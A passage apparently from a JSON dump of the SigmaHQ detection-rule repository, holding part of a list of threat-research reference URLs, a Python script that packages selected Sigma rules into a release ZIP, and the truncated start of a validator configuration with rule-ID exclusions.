vaddon-and-new-techniques-emerge-industrial-sector-targeted\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a\nhttps://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a\nhttps://www.trimarcsecurity.com/sin
gle-post/TrimarcResearch/Detecting-Kerberoasting-Activity\nhttps://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nhttps://www.trustedsec.com/blog/art_of_kerberoast/\nhttps://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/\nhttps://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/\nhttps://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\nhttps://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nhttps://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/\nhttps://www.trustedsec.com/july-2015/malicious-htas/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/\nhttps://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell\nhttps://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800\nhttps://www.ult
imatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nhttps://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015\nhttps://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers\nhttps://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\nhttps://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing\nhttps://www.us-cert.gov/ncas/alerts/TA17-117A\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-312A\nhttps://www.varonis.com/blog/investigate-ntlm-brute-force\nhttps://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens\nhttps://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nhttps://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2\nhttps://www.virusradar.com/en/Win32_Kasidet.AD/description\nhttps://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection\nhttps://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/\nhttps://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/\nhttps://www.virustotal.com/gui/domain/paste.ee/relations\nhttps://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915\nhttps://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior\nhttps://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3
ba0442ac58dab3/behavior\nhttps://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nhttps://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior\nhttps://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations\nhttps://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\nhttps://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection\nhttps://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\nhttps://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior\nhttps://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior\nhttps://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045\nhttps://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57\nhttps://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection\nhttps://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465\nhttps://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection\nhttps://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nhttps://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\nhttps://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\nhttps://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nhttps://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nhttps://www.virustotal.com/gu
i/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2\nhttps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\nhttps://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nhttps://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\nhttps://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916\nhttps://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior\nhttps://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nhttps://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior\nhttps://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01\nhttps://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d\nhttps://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior\nhttps://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection\nhttps://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior\nhttps://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nhttps://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619\nhttps://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nhttps://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\nhttps://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c\nhttps://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a5
42c7b261d/detection\nhttps://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05\nhttps://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content\nhttps://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242\nhttps://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior\nhttps://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community\nhttps://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection\nhttps://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424\nhttps://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f\nhttps://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details\nhttps://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797\nhttps://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior\nhttps://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448\nhttps://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior\nhttps://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection\nhttps://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\nhttps://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nhttps://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection\nhttps://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior\nhttps://www.virustotal.com/gui/fil
e/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62\nhttps://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection\nhttps://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add\nhttps://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nhttps://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection\nhttps://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content\nhttps://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c\nhttps://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection\nhttps://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7\nhttps://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761\nhttps://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/\nhttps://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior\nhttps://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content\nhttps://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations\nhttps://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE\nhttps://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nhttps://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44\nhttps://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466\nhttps://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd
\nhttps://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection\nhttps://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior\nhttps://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community\nhttps://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474\nhttps://www.virustotal.com/gui/file/fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789/behavior\nhttps://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files\nhttps://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files\nhttps://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files\nhttps://www.virustotal.com/gui/search/metadata%253ACube0x0/files\nhttps://www.vmray.com/analyses/2d2fa29185ad/report/overview.html\nhttps://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/\nhttps://www.vmware.com/security/advisories/VMSA-2021-0002.html\nhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\nhttps://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nhttps://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\nhttps://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\nhttps://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html\nhttps://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nhttps://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/\nhttps://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/\n
https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/\nhttps://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\nhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/\nhttps://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/\nhttps://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/\nhttps://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/\nhttps://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/\nhttps://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/\nhttps://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/\nhttps://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\nhttps://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/\nhttps://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf\nhttps://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nhttps://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\nhttps://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\nhttps://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\nhttps://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\nhttps://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nhttps://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nhttps://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\nhttps://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/\nhttps://www.x86matthew.com/view_post?id=create_svc_rpc\nhttps://www.x86matthew.com/view_post?id=embed_exe_lnk\nhttps://www.yang99.top/index.php/archives/82/\nhttps://www.yeahhub.com/list-installed-programs-version-pa
th-windows/\nhttps://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s\nhttps://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s\nhttps://www.youtube.com/watch?v=DLtJTxMWZ2o\nhttps://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nhttps://www.youtube.com/watch?v=ebmW42YYveI\nhttps://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek\nhttps://www.youtube.com/watch?v=Ie831jF0bb0\nhttps://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW\nhttps://www.youtube.com/watch?v=ro2QuZTIMBM\nhttps://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07\nhttps://www.zerodayinitiative.com/advisories/ZDI-21-1308/\nhttps://www.zerodayinitiative.com/advisories/ZDI-23-491/\nhttps://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege\nhttps://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server\nhttps://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal\nhttps://www.zoocoup.org/casper/jamf_cheatsheet.pdf\nhttps://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users\nhttps://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east\nhttps://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nhttps://www.zscaler.com/blogs/security-research/steal-it-campaign\nhttps://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\nhttps://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nhttps://x.com/_st0pp3r_/status/1742203752361128162?s=20\nhttps://x.com/cyb3rops/status/1862406110365245506\nhttps://x.com/defusedcyber/status/1971492272966598683\nhttps://x.com/nas_bench/status/1868639048484425963\nhttps://x.com/NullSecurityX/status/1937444064867029179\nhttps://x.com/russianpanda9xx/status/1940831134759506029\nhttps://x.com/y
arden_shafir/status/1822667605175324787\nhttps://xmrig.com/docs/miner/command-line-options\nhttps://xz.aliyun.com/t/12175\nhttps://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\nhttps://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf\nhttps://youtu.be/5mqid-7zp8k?t=2231\nhttps://youtu.be/5mqid-7zp8k?t=2481\nhttps://youtu.be/7aemGhaE9ds?t=641\nhttps://youtu.be/n2dFlSaBBKo\nhttps://youtu.be/zSihR3lTf7g\nhttps://zero2auto.com/2020/05/19/netwalker-re/\nhttps://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nhttps://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\n"
  },
  {
    "path": "tests/sigma-package-release.py",
    "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreates the Sigma release archive packages for different configurations\n\nEXAMPLE\n# python3 sigma-package-release.py --min-status test --levels high critical --rule-types generic --outfile Sigma-standard.zip\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport yaml\nimport zipfile\nimport datetime\nimport subprocess\n\nSTATUS = [\"experimental\", \"test\", \"stable\"]\nLEVEL = [\"informational\", \"low\", \"medium\", \"high\", \"critical\"]\nRULES_DICT = {\n    \"generic\": \"rules\",\n    \"rules\": \"rules\",\n    \"core\": \"rules\",\n    \"emerging-threats\": \"rules-emerging-threats\",\n    \"rules-emerging-threats\": \"rules-emerging-threats\",\n    \"et\": \"rules-emerging-threats\",\n    \"threat-hunting\": \"rules-threat-hunting\",\n    \"th\": \"rules-threat-hunting\",\n    \"rules-threat-hunting\": \"rules-threat-hunting\",\n}\nRULES = [x for x in RULES_DICT.keys()]\n\n\ndef init_arguments(arguments: list) -> list:\n    parser = argparse.ArgumentParser(\n        description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter\n    )\n    parser.add_argument(\n        \"-o\",\n        \"--outfile\",\n        help=\"Outputs the Sigma release package as ZIP archive\",\n        default=\"Sigma-standard.zip\",\n        required=True,\n    )\n    arg_status = parser.add_mutually_exclusive_group(required=True)\n    arg_status.add_argument(\n        \"-s\", \"--statuses\", nargs=\"*\", choices=STATUS, help=\"Select status of rules\"\n    )\n    arg_status.add_argument(\n        \"-ms\",\n        \"--min-status\",\n        nargs=\"?\",\n        choices=STATUS,\n        help=\"Sets the minimum status of rules to select\",\n    )\n    arg_level = parser.add_mutually_exclusive_group(required=True)\n    arg_level.add_argument(\n        \"-l\", \"--levels\", nargs=\"*\", choices=LEVEL, help=\"Select level of rules\"\n    )\n    arg_level.add_argument(\n        \"-ml\",\n        
\"--min-level\",\n        nargs=\"?\",\n        choices=LEVEL,\n        help=\"Sets the minimum level of rules to select\",\n    )\n    parser.add_argument(\n        \"-r\", \"--rule-types\", choices=RULES, nargs=\"*\", help=\"Select type of rules\"\n    )\n    args = parser.parse_args(arguments)\n\n    if not args.outfile.endswith(\".zip\"):\n        args.outfile = args.outfile + \".zip\"\n\n    if os.path.exists(args.outfile):\n        print(\n            \"[E] '{}' already exists. Choose a different output file name.\".format(\n                args.outfile\n            )\n        )\n        sys.exit(1)\n\n    if args.rule_types is None:\n        args.rule_types = [\"generic\"]\n        print('[I] -r/--rule-types not defined: Using \"generic\" by default')\n\n    # A minimum level/status expands to that entry and every stricter one\n    if args.min_level is not None:\n        i = LEVEL.index(args.min_level)\n        args.levels = LEVEL[i:]\n\n    if args.min_status is not None:\n        i = STATUS.index(args.min_status)\n        args.statuses = STATUS[i:]\n\n    return args\n\n\ndef select_rules(args: argparse.Namespace) -> list:\n    selected_rules = []\n\n    def yield_next_rule_file_path(rule_path: str):\n        # Walk the rule directory and yield every .yml rule file path\n        for root, _, files in os.walk(rule_path):\n            for file in files:\n                if file.endswith(\".yml\"):\n                    yield os.path.join(root, file)\n\n    def get_rule_yaml(file_path: str) -> list:\n        # Returns one dict per YAML document in the file\n        data = []\n\n        with open(file_path, encoding=\"utf-8\") as f:\n            yaml_parts = yaml.safe_load_all(f)\n            for part in yaml_parts:\n                data.append(part)\n        return data\n\n    for rules_path_alias in args.rule_types:\n        rules_path = RULES_DICT[rules_path_alias]\n        for file in yield_next_rule_file_path(rule_path=rules_path):\n            rule_yaml = get_rule_yaml(file_path=file)\n            if len(rule_yaml) != 1:\n                print(\n                    \"[E] rule {} is a multi-document file and will be skipped\".format(\n                        file\n                    )\n                )\n                continue\n\n            rule = rule_yaml[0]\n            if rule[\"level\"] in args.levels and rule[\"status\"] in args.statuses:\n                selected_rules.append(file)\n\n    return selected_rules\n\n\ndef write_zip(outfile: str, selected_rules: list):\n    with zipfile.ZipFile(\n        outfile, mode=\"a\", compression=zipfile.ZIP_DEFLATED, compresslevel=9\n    ) as zf:\n        for rule_path in selected_rules:\n            zf.write(rule_path)\n\n        # Write version info text file\n        today = datetime.date.today().isoformat()\n        label = subprocess.check_output([\"git\", \"describe\", \"--always\"]).strip()\n        commit_hash = subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip()\n        version = \"Release Date: {}\\nLabel: {}\\nCommit-Hash: {}\\n\".format(\n            today, label.decode(), commit_hash.decode()\n        )\n        zf.writestr(\"version.txt\", version)\n    return\n\n\ndef main(arguments: list) -> int:\n    args = init_arguments(arguments)\n\n    print(\"[I] Parsing and selecting rules, this will take some time...\")\n    selected_rules = select_rules(args)\n    print(\"[I] Selected {} rules\".format(len(selected_rules)))\n\n    write_zip(args.outfile, selected_rules)\n    print(\"[I] Written all rules to output ZIP file '{}'\".format(args.outfile))\n    return 0\n\n\nif __name__ == \"__main__\":\n    sys.exit(main(sys.argv[1:]))\n"
  },
  {
    "path": "tests/sigma_cli_conf.yml",
    "content": "validators:\n    - all\n    - -tlptag\n    - -tlpv1_tag\n    - -sigmahq_fieldname_cast\n    - -sigmahq_filename_prefix\n    - -sigmahq_logsource_unknown\n    - -sigmahq_ofselection_condition\n    - -sigmahq_sysmon_missing_eventid\nexclusions:\n    # escaped_wildcard\n    021310d9-30a6-480a-84b7-eaa69aeb92bb: escaped_wildcard\n    1114e048-b69c-4f41-bc20-657245ae6e3f: escaped_wildcard\n    204b17ae-4007-471b-917b-b917b315c5db: escaped_wildcard\n    214e8f95-100a-4e04-bb31-ef6cba8ce07e: escaped_wildcard\n    220457c1-1c9f-4c2e-afe6-9598926222c1: escaped_wildcard\n    252902e3-5830-4cf6-bf21-c22083dfd5cf: escaped_wildcard\n    2d3cdeec-c0db-45b4-aa86-082f7eb75701: escaped_wildcard\n    2e7bbd54-2f26-476e-b4a1-ba5f1a012614: escaped_wildcard\n    304810ed-8853-437f-9e36-c4975c3dfd7e: escaped_wildcard\n    31d68132-4038-47c7-8f8e-635a39a7c174: escaped_wildcard\n    32d56ea1-417f-44ff-822b-882873f5f43b: escaped_wildcard\n    4281cb20-2994-4580-aa63-c8b86d019934: escaped_wildcard\n    434c08ba-8406-4d15-8b24-782cb071a691: escaped_wildcard\n    435e10e4-992a-4281-96f3-38b11106adde: escaped_wildcard\n    52d8b0c6-53d6-439a-9e41-52ad442ad9ad: escaped_wildcard\n    586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3: escaped_wildcard\n    59e938ff-0d6d-4dc3-b13f-36cc28734d4e: escaped_wildcard\n    7857f021-007f-4928-8b2c-7aedbe64bb82: escaped_wildcard\n    7aaa5739-12fc-41aa-b98b-23ec27d42bdf: escaped_wildcard\n    7c9340a9-e2ee-4e43-94c5-c54ebbea1006: escaped_wildcard\n    7dc2dedd-7603-461a-bc13-15803d132355: escaped_wildcard\n    8fe1c584-ee61-444b-be21-e9054b229694: escaped_wildcard\n    904e8e61-8edf-4350-b59c-b905fc8e810c: escaped_wildcard\n    95724fc1-a258-4674-97db-a30351981c5a: escaped_wildcard\n    9637e8a5-7131-4f7f-bdc7-2b05d8670c43: escaped_wildcard\n    a36ce77e-30db-4ea0-8795-644d7af5dfb4: escaped_wildcard\n    a4824fca-976f-4964-b334-0621379e84c4: escaped_wildcard\n    a8f29a7b-b137-4446-80a0-b804272f3da2: escaped_wildcard\n    
afe52666-401e-4a02-b4ff-5d128990b8cb: escaped_wildcard\n    c2993223-6da8-4b1a-88ee-668b8bf315e9: escaped_wildcard\n    c37510b8-2107-4b78-aa32-72f251e7a844: escaped_wildcard\n    c462f537-a1e3-41a6-b5fc-b2c2cef9bf82: escaped_wildcard\n    c73124a7-3e89-44a3-bdc1-25fe4df754b1: escaped_wildcard\n    d84c0ded-edd7-4123-80ed-348bb3ccc4d5: escaped_wildcard\n    db885529-903f-4c5d-9864-28fe199e6370: escaped_wildcard\n    dd218fb6-4d02-42dc-85f0-a0a376072efd: escaped_wildcard\n    dde85b37-40cd-4a94-b00c-0b8794f956b5: escaped_wildcard\n    e06ac91d-b9e6-443d-8e5b-af749e7aa6b6: escaped_wildcard\n    f3f21ce1-cdef-4bfc-8328-ed2e826f5fac: escaped_wildcard\n    f57f8d16-1f39-4dcb-a604-6c73d9b54b3d: escaped_wildcard\n    f6de6525-4509-495a-8a82-1f8b0ed73a00: escaped_wildcard\n    fb502828-2db0-438e-93e6-801c7548686d: escaped_wildcard\n    64e8e417-c19a-475a-8d19-98ea705394cc: escaped_wildcard\n    # number_as_string\n    5c84856b-55a5-45f1-826f-13f37250cf4e: number_as_string\n    749c9f5e-b353-4b90-a9c1-05243357ca4b: number_as_string\n    85b88e05-dadc-430b-8a9e-53ff1cd30aae: 